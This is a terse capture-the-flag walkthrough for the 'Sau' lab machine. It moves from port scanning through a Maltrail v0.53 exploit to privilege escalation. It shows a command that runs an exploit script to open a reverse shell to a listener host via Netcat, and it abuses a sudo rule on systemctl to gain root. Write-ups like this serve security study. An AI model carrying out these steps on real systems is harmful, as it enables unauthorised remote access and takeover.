Sau
Writeup
Let scan it first, we can see there are some open ports here.
Access to the website, go to my basket link. Modify settings
Do some research about Maltrail (v0.53)
, we have payload file.
Using Netcat
and python3 exploit.py 1.2.3.4 1337 http://example.com
, we can now get a reverse shell.
sudo -l
to check the list of commands that the current user can execute with elevated privileges using sudo.
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
We can do this command to escalate privilege by sudo /usr/bin/systemctl status trail.service